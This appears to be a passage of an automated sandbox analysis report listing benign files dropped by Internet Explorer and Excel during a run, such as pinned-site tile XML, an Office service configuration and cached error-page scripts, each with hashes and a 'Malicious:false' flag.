                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):662
                                                                                                                                                                Entropy (8bit):5.136788640295428
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxvLV3N3TnWimI002EtM3MHdNMNxvLV3N3TnWimI00ObmZEtMb:2d6Nxvh3N3TSZHKd6Nxvh3N3TSZ7mb
                                                                                                                                                                MD5:4E4D5498C4A16D70F8920545C723D39D
                                                                                                                                                                SHA1:756FF5CD5B439C6E57A88C95FBD37FFB47355792
                                                                                                                                                                SHA-256:36132C63143D2A8EAC3A102D3856FB549FC7CB84E93135EED3BF4F7DAEE8FD1C
                                                                                                                                                                SHA-512:1C3C5C2485993969B33E5B446A1F054F2D62BF1A722C3D25D86C48A707A67E3F29D8F9F20B0DB5D4FE48188240259B098AB70A351A9C893D734BC7776D8A699C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):5.065918622800244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxia/mnWimI002EtM3MHdNMNxia/mnWimI00Obd5EtMb:2d6NxkSZHKd6NxkSZ7Jjb
                                                                                                                                                                MD5:6246BDE7DF4FCDA0BC7048B74C14155A
                                                                                                                                                                SHA1:68619801854D035811ECC95366232E86F88EC39E
                                                                                                                                                                SHA-256:963EF10FA72C3FD1FA97E84ACB35B2036F2D85831120F4CB0DD8FE0F35E3269C
                                                                                                                                                                SHA-512:4D2233773E3F2D8100CE87924E1F955D5241FE8201D70D8BBD3160D35B40D76D7EF1C4F0D5C860086CB40379CF755EBE2E4544F67E9413F1BB2D48A01A9EE629
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.1489570187121005
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxhGwV3N3TnWimI002EtM3MHdNMNxhGwV3N3TnWimI00Ob8K075EtMb:2d6NxQ43N3TSZHKd6NxQ43N3TSZ7YKa/
                                                                                                                                                                MD5:29E6A94B721E07C691157F21C9DDC9F4
                                                                                                                                                                SHA1:AAF5D22B8460AE65FAE6951CCE474BAAA78FD749
                                                                                                                                                                SHA-256:80270DA4EA34E2D6AAC9B78EFDFDB551E6293BE93399D57D8D14170D778CAC40
                                                                                                                                                                SHA-512:FD749B504705AD499681166CF3DABCC6A2D10BA22A23644D71A2DFA76151DE8DE0F1927F7D527D2F19CDD524A63B46DF9D62D983F9DDC311EC537EB44D152F92
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.049251456889828
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNx0na/mnWimI002EtM3MHdNMNx0na/mnWimI00ObxEtMb:2d6Nx0fSZHKd6Nx0fSZ7nb
                                                                                                                                                                MD5:AF79916588ECEB8DE2F37596B5CFD9AB
                                                                                                                                                                SHA1:1ED4FEC5493E4A9DA9C5D24EE37B9624279DCC9B
                                                                                                                                                                SHA-256:559328BE63BF10D7AF274EA7D37BC7A4C944431F4875F85289AD9ACFC9BDAA67
                                                                                                                                                                SHA-512:3C3505ADC49063B24B2DFAA73D5FF73491F0549C4C97CDB260A55EAAD0411DCE42B9584C864B9C49427C2D79CC9CCC50C938CF6AD265A0D31CA999158063F0EC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.09118941820664
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxxa/mnWimI002EtM3MHdNMNxxa/mnWimI00Ob6Kq5EtMb:2d6NxZSZHKd6NxZSZ7ob
                                                                                                                                                                MD5:7444DAD90865D1C0D12325E671E68B5B
                                                                                                                                                                SHA1:66017F5494B746FFB2AF7DBDC1A7E0740C24B910
                                                                                                                                                                SHA-256:0C9E37AEB53CA36742B577455DCABC2E7284C0C851C080C4091CD48C97E40847
                                                                                                                                                                SHA-512:C0F9E91597E6867C0BE986362EC2AED8F3DBA83125007B91C0096DBCC8E04843E98B37643A1CF34DFF7DBEC7F26EDCEDE4EEA65EDF8C9914F4C8337D09624274
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):659
                                                                                                                                                                Entropy (8bit):5.061859989595668
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxca/mnWimI002EtM3MHdNMNxca/mnWimI00ObVEtMb:2d6NxeSZHKd6NxeSZ7Db
                                                                                                                                                                MD5:8FEE54DFA3411F625D8ED1E88EC514B9
                                                                                                                                                                SHA1:E67044B5420D89F9A7066CB99DDDC02EAEB8C8EA
                                                                                                                                                                SHA-256:8D26BD1C0E10A05AC2DEFB0654DEC4823E77C5C9CC771A1D85C70BC71BDCCE28
                                                                                                                                                                SHA-512:9C67F8E18AF4E9CA8A4F8A18DE74ADC4B62663300BCDD95211128DECB38B9F41BB3CB7C3468DD517A3948E447CAFF6138231F470D246EF336C7A0E6F96C49388
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.0519975493291644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxfna/mnWimI002EtM3MHdNMNxfna/mnWimI00Obe5EtMb:2d6NxHSZHKd6NxHSZ7ijb
                                                                                                                                                                MD5:128F29080C333A45A539BB3555A98792
                                                                                                                                                                SHA1:A6EEE2AF178F339D9985D675700BEA704B88E3C2
                                                                                                                                                                SHA-256:A0292B34ED728A07A85BD8E9E89453E4B21E2FEAC851E464E4B2198E60F26E7A
                                                                                                                                                                SHA-512:4746191CA63D7BDF4FB5C36C7416EDF4A89F648C40A5119F5F0954FF8455E33F74B97F77909CEB5DDAC903B6178775090A4419EA5C920930A94E6C149FB72E56
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D18DB67F-C32A-4E79-9062-0C1A4F78D8FB
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):134922
                                                                                                                                                                Entropy (8bit):5.369112384074001
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:9cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:pEQ9DQW+ziXOe
                                                                                                                                                                MD5:202418F344CB882FA00BA969D15999F0
                                                                                                                                                                SHA1:EA73964E25E6372D218265C44B6CBC7D80089119
                                                                                                                                                                SHA-256:869B61ACF54ECE951CDDD4378AF8E500E09BBD7DBAC458EBD1E5041F7F32D612
                                                                                                                                                                SHA-512:FFCE0AFACCCD2F8B5C0E71268BDE9E871241AE2EDC38863121F22EDFC6274885D8B1E33010BA323609E27483EADE93AE25EFC96485F0B0F5FEEAE3A229DB35F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T03:06:37">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DFF046B8.png
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PNG image data, 1038 x 657, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82182
                                                                                                                                                                Entropy (8bit):7.937734438427685
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:BlthHGaFc1QdzhAVSrTINQzmxUF55taYxfvrnlljQ/9o3CNdaU3OLP:rRd9AY3yQzmq55HxfznllWA6dROLP
                                                                                                                                                                MD5:65F572544B616B7638EFC2A0DEE5EF2D
                                                                                                                                                                SHA1:26964C665C300FFAEF2D77CC455C305B014B149A
                                                                                                                                                                SHA-256:EFDE5EAA221B569C35140B384FC762AC48EA5EFE7F6EF8CF228448A8A6D18E4E
                                                                                                                                                                SHA-512:76B36C6BFF20B9E32471E8F6FD72E800C11DC0CDA47E3A59F3B792A1E5DBFC3CD5977AE9A3CE60E6AFEBAEAED1E82651C0FC513B98A62980744E709A3F008F2D
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
